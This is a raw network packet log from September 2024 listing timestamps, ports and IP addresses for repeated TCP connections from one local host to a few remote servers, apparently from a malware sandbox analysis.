Sep 19, 2024 02:25:18.447506905 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.447525978 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.447573900 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.447981119 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.448004007 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.448070049 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.448076963 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.448118925 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.448523045 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.448539019 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.448596001 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.448601961 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.448637962 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.449067116 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.449080944 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.449126005 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.449132919 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.449157000 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.449181080 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.449558973 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.449573040 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.449629068 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.449634075 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.449676037 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.450020075 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.450032949 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.450083017 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.450088978 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.450129032 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.450480938 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.450494051 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.450551033 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.450556040 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.450597048 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.459752083 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.459768057 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.459960938 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.459969997 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.460017920 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.529687881 CEST	49712	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:18.534838915 CEST	39001	49712	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:18.534980059 CEST	49712	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:18.535895109 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.535909891 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.535989046 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.536004066 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.536053896 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.536530018 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.536542892 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.536614895 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.536621094 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.536691904 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.537111998 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.537123919 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.537190914 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.537197113 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.537240982 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.537719011 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.537731886 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.537796974 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.537801981 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.537846088 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.538203001 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.538214922 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.538292885 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.538300037 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.538347960 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.538671017 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.538686037 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.538744926 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.538750887 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.538799047 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.539141893 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.539160013 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.539591074 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.539597034 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.539645910 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.550910950 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.550925970 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.550998926 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.551011086 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.551064968 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.570768118 CEST	49712	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:18.575562000 CEST	39001	49712	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:18.575674057 CEST	49712	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:18.580462933 CEST	39001	49712	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:18.624826908 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.624847889 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.624931097 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.624943972 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.625264883 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.625492096 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.625504971 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.625582933 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.625587940 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.625680923 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.626025915 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.626039028 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.626104116 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.626110077 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.626149893 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.626537085 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.626550913 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.626621962 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.626627922 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.626671076 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.626931906 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.626945972 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.627007961 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.627012968 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.627087116 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.627315998 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.627329111 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.627408981 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.627415895 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.627463102 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.627767086 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.627779961 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.627841949 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.627847910 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.627990961 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.637486935 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.637499094 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.637587070 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.637593985 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.637655020 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.713624001 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.713639975 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.713711023 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.713726997 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.713773012 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.714157104 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.714169979 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.714232922 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.714238882 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.714282036 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.714471102 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.714509964 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.714524031 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.714529991 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.714540958 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:18.714569092 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.714595079 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:18.718159914 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:19.190690994 CEST	39001	49712	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:19.231369972 CEST	49712	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:19.324117899 CEST	39001	49712	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:19.324774981 CEST	49712	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:19.330163002 CEST	39001	49712	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:19.330219030 CEST	49712	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:19.435292959 CEST	49713	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:19.440570116 CEST	39001	49713	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:19.440743923 CEST	49713	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:19.470736027 CEST	49713	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:19.475889921 CEST	39001	49713	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:19.476070881 CEST	49713	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:19.481137991 CEST	39001	49713	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:20.064732075 CEST	39001	49713	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:20.106277943 CEST	49713	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:21.121543884 CEST	39001	49713	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:21.121578932 CEST	39001	49713	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:21.121777058 CEST	39001	49713	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:21.121798992 CEST	49713	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:21.121818066 CEST	49713	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:21.122366905 CEST	39001	49713	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:21.122370005 CEST	49713	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:21.122407913 CEST	49713	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:21.127389908 CEST	39001	49713	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:21.127444983 CEST	49713	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:21.232000113 CEST	49714	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:21.236804962 CEST	39001	49714	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:21.236867905 CEST	49714	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:21.271785021 CEST	49714	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:21.276627064 CEST	39001	49714	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:21.276675940 CEST	49714	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:21.281460047 CEST	39001	49714	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:21.891738892 CEST	39001	49714	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:21.934395075 CEST	49714	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:22.049405098 CEST	39001	49714	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:22.051059961 CEST	49714	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:22.056004047 CEST	39001	49714	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:22.056093931 CEST	49714	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:22.169722080 CEST	49715	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:22.174551010 CEST	39001	49715	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:22.174669027 CEST	49715	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:22.288131952 CEST	49715	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:22.293102980 CEST	39001	49715	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:22.293174028 CEST	49715	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:22.298137903 CEST	39001	49715	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:22.823271036 CEST	39001	49715	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:22.871902943 CEST	49715	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:22.963601112 CEST	39001	49715	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:22.964677095 CEST	49715	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:22.970381975 CEST	39001	49715	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:22.970453024 CEST	49715	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:23.075706005 CEST	49717	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:23.081578970 CEST	39001	49717	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:23.081792116 CEST	49717	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:23.109430075 CEST	49717	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:23.116817951 CEST	39001	49717	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:23.116975069 CEST	49717	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:23.125035048 CEST	39001	49717	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:23.507900000 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:25:23.512751102 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:25:23.512821913 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:25:23.512944937 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:25:23.517699957 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:25:23.740027905 CEST	39001	49717	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:23.793827057 CEST	49717	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:23.871464014 CEST	39001	49717	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:23.872116089 CEST	49717	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:23.877187967 CEST	39001	49717	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:23.877651930 CEST	49717	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:23.983283997 CEST	49720	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:23.989003897 CEST	39001	49720	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:23.989116907 CEST	49720	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:24.049415112 CEST	49720	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:24.054284096 CEST	39001	49720	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:24.055857897 CEST	49720	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:24.060806036 CEST	39001	49720	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:24.168541908 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:25:24.215687990 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:25:24.643932104 CEST	39001	49720	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:24.643990040 CEST	49720	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:24.644184113 CEST	49720	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:24.649857044 CEST	39001	49720	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:24.763837099 CEST	49722	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:24.769108057 CEST	39001	49722	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:24.769176960 CEST	49722	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:24.795031071 CEST	49722	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:24.799910069 CEST	39001	49722	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:24.799966097 CEST	49722	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:24.804758072 CEST	39001	49722	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:25.405016899 CEST	39001	49722	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:25.405080080 CEST	49722	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:25.405210018 CEST	49722	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:25.410290956 CEST	39001	49722	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:25.513186932 CEST	49724	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:25.518301964 CEST	39001	49724	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:25.518368959 CEST	49724	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:25.560458899 CEST	49724	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:25.565566063 CEST	39001	49724	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:25.565613985 CEST	49724	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:25.571012020 CEST	39001	49724	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:26.158849001 CEST	39001	49724	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:26.160178900 CEST	49724	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:26.160178900 CEST	49724	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:26.164964914 CEST	39001	49724	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:26.266084909 CEST	49726	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:26.271148920 CEST	39001	49726	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:26.271377087 CEST	49726	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:26.284276009 CEST	49726	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:26.289057970 CEST	39001	49726	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:26.289244890 CEST	49726	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:26.294059992 CEST	39001	49726	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:26.914484978 CEST	39001	49726	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:26.914556980 CEST	49726	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:26.914750099 CEST	49726	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:26.919589996 CEST	39001	49726	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:27.056610107 CEST	49727	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:27.061553955 CEST	39001	49727	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:27.061642885 CEST	49727	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:27.080071926 CEST	49727	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:27.084876060 CEST	39001	49727	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:27.084964991 CEST	49727	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:27.090662003 CEST	39001	49727	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:27.687172890 CEST	39001	49727	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:27.687597990 CEST	49727	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:27.688035011 CEST	49727	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:27.696417093 CEST	39001	49727	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:27.794564009 CEST	49728	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:27.799563885 CEST	39001	49728	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:27.799904108 CEST	49728	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:27.812784910 CEST	49728	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:27.817653894 CEST	39001	49728	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:27.818083048 CEST	49728	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:27.823000908 CEST	39001	49728	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:28.437330961 CEST	39001	49728	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:28.437483072 CEST	49728	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:28.437736988 CEST	49728	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:28.443315029 CEST	39001	49728	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:28.544691086 CEST	49729	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:28.549688101 CEST	39001	49729	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:28.549777985 CEST	49729	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:28.560992956 CEST	49729	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:28.565895081 CEST	39001	49729	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:28.568804979 CEST	49729	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:28.574847937 CEST	39001	49729	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:29.173212051 CEST	39001	49729	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:29.173280001 CEST	49729	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:29.173397064 CEST	49729	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:29.178164005 CEST	39001	49729	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:29.278836012 CEST	49730	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:29.283621073 CEST	39001	49730	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:29.283704042 CEST	49730	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:29.296284914 CEST	49730	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:29.301094055 CEST	39001	49730	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:29.301163912 CEST	49730	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:29.305919886 CEST	39001	49730	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:29.917294979 CEST	39001	49730	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:29.917442083 CEST	49730	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:29.917732000 CEST	49730	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:29.922521114 CEST	39001	49730	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:30.029310942 CEST	49731	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:30.034307957 CEST	39001	49731	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:30.034390926 CEST	49731	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:30.122081995 CEST	49731	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:30.127253056 CEST	39001	49731	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:30.128760099 CEST	49731	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:30.133846045 CEST	39001	49731	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:30.674228907 CEST	39001	49731	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:30.674280882 CEST	49731	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:30.674406052 CEST	49731	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:30.679203987 CEST	39001	49731	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:30.779695034 CEST	49732	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:30.788368940 CEST	39001	49732	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:30.788434029 CEST	49732	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:30.804678917 CEST	49732	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:30.809592962 CEST	39001	49732	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:30.809652090 CEST	49732	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:30.814508915 CEST	39001	49732	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:31.413470030 CEST	39001	49732	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:31.413556099 CEST	49732	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:31.413669109 CEST	49732	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:31.418436050 CEST	39001	49732	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:31.529114008 CEST	49733	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:31.534137964 CEST	39001	49733	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:31.534218073 CEST	49733	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:31.547147036 CEST	49733	39001	192.168.2.5	45.11.229.96
